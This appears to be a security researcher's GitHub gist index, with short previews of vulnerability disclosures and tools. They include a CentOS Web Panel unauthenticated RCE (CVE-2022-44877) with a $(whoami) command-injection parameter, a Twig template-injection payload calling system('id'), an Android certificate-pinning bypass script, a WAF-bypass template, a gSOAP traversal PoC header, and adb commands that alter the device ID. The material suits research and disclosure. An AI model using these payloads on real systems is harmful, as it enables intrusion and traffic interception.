This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: waf-bypass-numi | |
| info: | |
| name: waf-bypass-numi | |
| author: numanture | |
| requests: | |
| - raw: | |
| - | | |
| GET /blabla HTTP/1.1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Title: gSOAP 2.8 - Directory Traversal | |
| # Author: Numan Türle | |
| # Date: 2019-11-13 | |
| # Vendor Homepage: https://www.genivia.com/ | |
| # Version : gSOAP 2.8 | |
| # Software Link : https://www.genivia.com/products.html#gsoap | |
| POC | |
| --------- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Use this script to test if a given TCP host/port are available | |
| WAITFORIT_cmdname=${0##*/} | |
| echoerr() { if [[ $WAITFORIT_QUIET -ne 1 ]]; then echo "$@" 1>&2; fi } | |
| usage() | |
| { | |
| cat << USAGE >&2 |
numanturle
/ # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
Created
January 5, 2023 21:44
# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877 | |
| [+] Centos Web Panel 7 Unauthenticated Remote Code Execution | |
| [+] Centos Web Panel 7 - < 0.9.8.1147 | |
| [+] Affected Component ip:2031/login/index.php?login=$(whoami) | |
| [+] Discoverer: Numan Türle @ Gais Cyber Security | |
| [+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194 | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {%set x={'1':'id'}%}{{x|filter('system')}} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setTimeout(function() { | |
| Java.perform(function() { | |
| console.log(''); | |
| console.log('======'); | |
| console.log('[#] Android Bypass for various Certificate Pinning methods [#]'); | |
| console.log('======'); | |
| var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); | |
| var SSLContext = Java.use('javax.net.ssl.SSLContext'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| adb shell content query --uri content://settings/secure --where "name=\'android_id\'" | |
| adb shell content delete --uri content://settings/secure --where "name=\'android_id\'" | |
| adb shell content insert --uri content://settings/secure --bind name:s:android_id --bind value:s:7373de1e9e9670c2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: cisco-ucs | |
| info: | |
| name: Cisco UCS Director | |
| author: numanturle | |
| severity: critical | |
| tags: cisco,cisco imc,cisco-imc | |
| requests: | |
| - method: GET |
numanturle
/ vuln.c
Created
July 19, 2023 08:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| snprintf(filename, PATH_MAX, "%s/%s", config->webroot, page); // vuln |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SoapClient | |
| SplFileObject | |
| tidy |